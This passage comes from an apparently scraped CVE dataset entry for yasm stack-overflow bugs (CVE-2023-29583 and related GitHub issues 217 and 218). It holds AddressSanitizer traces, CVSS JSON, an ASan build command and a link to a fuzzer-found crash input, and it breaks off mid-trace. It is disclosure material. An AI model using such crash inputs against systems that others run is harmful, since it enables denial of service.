#110 0x57d0ac in parse_bexpr /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1224:5
#111 0x57ceb6 in parse_expr /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1215:13
#112 0x57d62e in parse_expr6 /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1401:17
#113 0x57f13f in parse_expr5 /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1305:9
#114 0x57ef2f in parse_expr4 /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1277:9
#115 0x57ecbc in parse_expr3 /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1249:9
#116 0x57eacc in parse_expr2 /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1242:5
#117 0x57e8dc in parse_expr1 /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1236:5
#118 0x57d29c in parse_expr0 /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1230:5
#119 0x57d0ac in parse_bexpr /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1224:5
#120 0x57ceb6 in parse_expr /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1215:13
#121 0x57d62e in parse_expr6 /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1401:17
#122 0x57f13f in parse_expr5 /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1305:9
#123 0x57ef2f in parse_expr4 /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1277:9
#124 0x57ecbc in parse_expr3 /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1249:9
#125 0x57eacc in parse_expr2 /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1242:5
#126 0x57e8dc in parse_expr1 /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1236:5
#127 0x57d29c in parse_expr0 /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1230:5
#128 0x57d0ac in parse_bexpr /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1224:5
#129 0x57ceb6 in parse_expr /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1215:13
#130 0x57d62e in parse_expr6 /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1401:17
#131 0x57f13f in parse_expr5 /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1305:9
#132 0x57ef2f in parse_expr4 /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1277:9
#133 0x57ecbc in parse_expr3 /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1249:9
#134 0x57eacc in parse_expr2 /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1242:5
#135 0x57e8dc in parse_expr1 /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1236:5
#136 0x57d29c in parse_expr0 /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1230:5
#137 0x57d0ac in parse_bexpr /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1224:5
#138 0x57ceb6 in parse_expr /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1215:13
#139 0x57d62e in parse_expr6 /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1401:17
#140 0x57f13f in parse_expr5 /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1305:9
#141 0x57ef2f in parse_expr4 /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1277:9
#142 0x57ecbc in parse_expr3 /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1249:9
#143 0x57eacc in parse_expr2 /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1242:5
#144 0x57e8dc in parse_expr1 /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1236:5
#145 0x57d29c in parse_expr0 /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1230:5
#146 0x57d0ac in parse_bexpr /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1224:5
#147 0x57ceb6 in parse_expr /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1215:13
#148 0x57d62e in parse_expr6 /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1401:17
#149 0x57f13f in parse_expr5 /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1305:9
#150 0x57ef2f in parse_expr4 /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1277:9
#151 0x57ecbc in parse_expr3 /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1249:9
#152 0x57eacc in parse_expr2 /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1242:5
#153 0x57e8dc in parse_expr1 /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1236:5
#154 0x57d29c in parse_expr0 /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1230:5
#155 0x57d0ac in parse_bexpr /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1224:5
#156 0x57ceb6 in parse_expr /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1215:13
#157 0x57d62e in parse_expr6 /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1401:17
#158 0x57f13f in parse_expr5 /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1305:9
#159 0x57ef2f in parse_expr4 /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1277:9
#160 0x57ecbc in parse_expr3 /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1249:9
#161 0x57eacc in parse_expr2 /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1242:5
#162 0x57e8dc in parse_expr1 /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1236:5
#163 0x57d29c in parse_expr0 /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1230:5
#164 0x57d0ac in parse_bexpr /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1224:5
#165 0x57ceb6 in parse_expr /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1215:13
#166 0x57d62e in parse_expr6 /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1401:17
#167 0x57f13f in parse_expr5 /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1305:9
#168 0x57ef2f in parse_expr4 /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1277:9
#169 0x57ecbc in parse_expr3 /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1249:9
#170 0x57eacc in parse_expr2 /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1242:5
#171 0x57e8dc in parse_expr1 /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1236:5
#172 0x57d29c in parse_expr0 /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1230:5
#173 0x57d0ac in parse_bexpr /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1224:5
#174 0x57ceb6 in parse_expr /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1215:13
#175 0x57d62e in parse_expr6 /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1401:17
#176 0x57f13f in parse_expr5 /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1305:9
#177 0x57ef2f in parse_expr4 /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1277:9
#178 0x57ecbc in parse_expr3 /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1249:9
#179 0x57eacc in parse_expr2 /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1242:5
#180 0x57e8dc in parse_expr1 /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1236:5
#181 0x57d29c in parse_expr0 /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1230:5
#182 0x57d0ac in parse_bexpr /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1224:5
#183 0x57ceb6 in parse_expr /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1215:13
#184 0x57d62e in parse_expr6 /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1401:17
#185 0x57f13f in parse_expr5 /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1305:9
#186 0x57ef2f in parse_expr4 /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1277:9
#187 0x57ecbc in parse_expr3 /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1249:9
#188 0x57eacc in parse_expr2 /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1242:5
#189 0x57e8dc in parse_expr1 /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1236:5
#190 0x57d29c in parse_expr0 /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1230:5
#191 0x57d0ac in parse_bexpr /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1224:5
#192 0x57ceb6 in parse_expr /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1215:13
#193 0x57d62e in parse_expr6 /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1401:17
#194 0x57f13f in parse_expr5 /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1305:9
#195 0x57ef2f in parse_expr4 /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1277:9
#196 0x57ecbc in parse_expr3 /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1249:9
#197 0x57eacc in parse_expr2 /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1242:5
#198 0x57e8dc in parse_expr1 /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1236:5
#199 0x57d29c in parse_expr0 /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1230:5
#200 0x57d0ac in parse_bexpr /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1224:5
#201 0x57ceb6 in parse_expr /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1215:13
#202 0x57d62e in parse_expr6 /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1401:17
#203 0x57f13f in parse_expr5 /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1305:9
#204 0x57ef2f in parse_expr4 /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1277:9
#205 0x57ecbc in parse_expr3 /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1249:9
#206 0x57eacc in parse_expr2 /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1242:5
#207 0x57e8dc in parse_expr1 /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1236:5
#208 0x57d29c in parse_expr0 /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1230:5
#209 0x57d0ac in parse_bexpr /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1224:5
#210 0x57ceb6 in parse_expr /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1215:13
#211 0x57d62e in parse_expr6 /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1401:17
#212 0x57f13f in parse_expr5 /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1305:9
#213 0x57ef2f in parse_expr4 /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1277:9
#214 0x57ecbc in parse_expr3 /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1249:9
#215 0x57eacc in parse_expr2 /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1242:5
#216 0x57e8dc in parse_expr1 /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1236:5
#217 0x57d29c in parse_expr0 /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1230:5
#218 0x57d0ac in parse_bexpr /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1224:5
#219 0x57ceb6 in parse_expr /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1215:13
#220 0x57d62e in parse_expr6 /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1401:17
#221 0x57f13f in parse_expr5 /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1305:9
#222 0x57ef2f in parse_expr4 /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1277:9
#223 0x57ecbc in parse_expr3 /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1249:9
#224 0x57eacc in parse_expr2 /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1242:5
#225 0x57e8dc in parse_expr1 /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1236:5
#226 0x57d29c in parse_expr0 /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1230:5
#227 0x57d0ac in parse_bexpr /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1224:5
#228 0x57ceb6 in parse_expr /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1215:13
#229 0x57d62e in parse_expr6 /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1401:17
#230 0x57f13f in parse_expr5 /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1305:9
#231 0x57ef2f in parse_expr4 /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1277:9
#232 0x57ecbc in parse_expr3 /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1249:9
#233 0x57eacc in parse_expr2 /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1242:5
#234 0x57e8dc in parse_expr1 /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1236:5
#235 0x57d29c in parse_expr0 /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1230:5
#236 0x57d0ac in parse_bexpr /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1224:5
#237 0x57ceb6 in parse_expr /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1215:13
#238 0x57d62e in parse_expr6 /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1401:17
#239 0x57f13f in parse_expr5 /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1305:9
#240 0x57ef2f in parse_expr4 /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1277:9
#241 0x57ecbc in parse_expr3 /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1249:9
#242 0x57eacc in parse_expr2 /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1242:5
#243 0x57e8dc in parse_expr1 /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1236:5
#244 0x57d29c in parse_expr0 /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1230:5
#245 0x57d0ac in parse_bexpr /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1224:5
#246 0x57ceb6 in parse_expr /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1215:13
#247 0x57d62e in parse_expr6 /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1401:17
#248 0x57f13f in parse_expr5 /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1305:9
SUMMARY: AddressSanitizer: stack-overflow /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1235 in parse_expr1
==2596551==ABORTING
```
## Reference
https://github.com/z1r00/fuzz_vuln/blob/main/yasm/stack-overflow/parse_expr1/readme.md | stack-overflow yasm/modules/parsers/nasm/nasm-parse.c:1235 in parse_expr1 | https://api.github.com/repos/yasm/yasm/issues/217/comments | 1 | 2023-03-31T08:22:30Z | 2024-03-22T11:56:45Z | https://github.com/yasm/yasm/issues/217 | 1,648,921,272 | 217 |
CVE-2023-29583 | 2023-04-24T13:15:07.523 | yasm 1.3.0.55.g101bc was discovered to contain a stack overflow via the function parse_expr5 at /nasm/nasm-parse.c. Note: This has been disputed by third parties who argue this is a bug and not a security issue because yasm is a standalone program not designed to run untrusted code. | {
"cvssMetricV2": null,
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 1.8,
"impactScore": 3.6,
"source": "[email protected]",
"type": "Primary"
}
]
} | [
{
"source": "[email protected]",
"tags": [
"Exploit",
"Issue Tracking"
],
"url": "https://github.com/yasm/yasm/issues/218"
},
{
"source": "[email protected]",
"tags": [
"Exploit"
],
"url": "https://github.com/z1r00/fuzz_vuln/blob/main/yasm/stack-overflow/parse_expr5/readme.md"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:yasm_project:yasm:1.3.0.55.g101bc:*:*:*:*:*:*:*",
"matchCriteriaId": "4A03B4FD-736D-40B7-87B0-AC4EF2660C4B",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | https://github.com/yasm/yasm/issues/218 | [
"Exploit",
"Issue Tracking"
] | github.com | [
"yasm",
"yasm"
] | # stack-overflow yasm/modules/parsers/nasm/nasm-parse.c:1303 in parse_expr5
## project address
https://github.com/yasm/yasm
## info
OS:Ubuntu20.04 TLS
Build: ./autogen.sh && make distclean && CC=gcc CXX=g++ CFLAGS="-fsanitize=address -fno-omit-frame-pointer -g" CXXFLAGS="-fsanitize=address -fno-omit-frame-pointer -g" ./configure --prefix=$PWD/build --disable-shared && make -j && make install
## Poc
https://github.com/z1r00/fuzz_vuln/blob/main/yasm/stack-overflow/parse_expr5/id:000456%2Csig:06%2Csrc:000215%2B005032%2Cop:splice%2Crep:64
## ASAN Info
```c
./yasm id:000456,sig:06,src:000215+005032,op:splice,rep:64
yasm: file name already has no extension: output will be in `yasm.out'
AddressSanitizer:DEADLYSIGNAL
=================================================================
==3060203==ERROR: AddressSanitizer: stack-overflow on address 0x7ffebdf10ff8 (pc 0x00000063de80 bp 0x7ffebdf11120 sp 0x7ffebdf11000 T0)
#0 0x63de80 in nasm_parser_lex /home/z1r0/fuzzing/yasm/yasm/./modules/parsers/nasm/nasm-token.re:117
#1 0x57d60d in parse_expr6 /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1400:13
#2 0x57f13f in parse_expr5 /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1305:9
#3 0x57ef2f in parse_expr4 /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1277:9
#4 0x57ecbc in parse_expr3 /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1249:9
#5 0x57eacc in parse_expr2 /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1242:5
#6 0x57e8dc in parse_expr1 /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1236:5
#7 0x57d29c in parse_expr0 /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1230:5
#8 0x57d62e in parse_expr6 /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1401:17
#9 0x57f13f in parse_expr5 /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1305:9
#10 0x57ef2f in parse_expr4 /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1277:9
#11 0x57ecbc in parse_expr3 /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1249:9
#12 0x57eacc in parse_expr2 /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1242:5
#13 0x57e8dc in parse_expr1 /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1236:5
#14 0x57d29c in parse_expr0 /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1230:5
#15 0x57d62e in parse_expr6 /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1401:17
#16 0x57f13f in parse_expr5 /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1305:9
#17 0x57ef2f in parse_expr4 /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1277:9
#18 0x57ecbc in parse_expr3 /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1249:9
#19 0x57eacc in parse_expr2 /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1242:5
#20 0x57e8dc in parse_expr1 /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1236:5
#21 0x57d29c in parse_expr0 /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1230:5
#22 0x57d62e in parse_expr6 /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1401:17
#23 0x57f13f in parse_expr5 /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1305:9
#24 0x57ef2f in parse_expr4 /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1277:9
#25 0x57ecbc in parse_expr3 /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1249:9
#26 0x57eacc in parse_expr2 /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1242:5
#27 0x57e8dc in parse_expr1 /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1236:5
#28 0x57d29c in parse_expr0 /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1230:5
#29 0x57d62e in parse_expr6 /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1401:17
#30 0x57f13f in parse_expr5 /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1305:9
#31 0x57ef2f in parse_expr4 /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1277:9
#32 0x57ecbc in parse_expr3 /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1249:9
#33 0x57eacc in parse_expr2 /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1242:5
#34 0x57e8dc in parse_expr1 /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1236:5
#35 0x57d29c in parse_expr0 /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1230:5
#36 0x57d62e in parse_expr6 /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1401:17
#37 0x57f13f in parse_expr5 /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1305:9
#38 0x57ef2f in parse_expr4 /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1277:9
#39 0x57ecbc in parse_expr3 /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1249:9
#40 0x57eacc in parse_expr2 /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1242:5
#41 0x57e8dc in parse_expr1 /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1236:5
#42 0x57d29c in parse_expr0 /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1230:5
#43 0x57d62e in parse_expr6 /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1401:17
#44 0x57f13f in parse_expr5 /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1305:9
#45 0x57ef2f in parse_expr4 /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1277:9
#46 0x57ecbc in parse_expr3 /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1249:9
#47 0x57eacc in parse_expr2 /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1242:5
#48 0x57e8dc in parse_expr1 /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1236:5
#49 0x57d29c in parse_expr0 /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1230:5
#50 0x57d62e in parse_expr6 /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1401:17
#51 0x57f13f in parse_expr5 /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1305:9
#52 0x57ef2f in parse_expr4 /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1277:9
#53 0x57ecbc in parse_expr3 /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1249:9
#54 0x57eacc in parse_expr2 /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1242:5
#55 0x57e8dc in parse_expr1 /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1236:5
#56 0x57d29c in parse_expr0 /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1230:5
#57 0x57d62e in parse_expr6 /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1401:17
#58 0x57f13f in parse_expr5 /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1305:9
#59 0x57ef2f in parse_expr4 /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1277:9
#60 0x57ecbc in parse_expr3 /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1249:9
#61 0x57eacc in parse_expr2 /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1242:5
#62 0x57e8dc in parse_expr1 /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1236:5
#63 0x57d29c in parse_expr0 /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1230:5
#64 0x57d62e in parse_expr6 /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1401:17
#65 0x57f13f in parse_expr5 /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1305:9
#66 0x57ef2f in parse_expr4 /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1277:9
#67 0x57ecbc in parse_expr3 /home/z1r0/fuzzing/yasm/yasm/modules/parsers/nasm/nasm-parse.c:1249:9
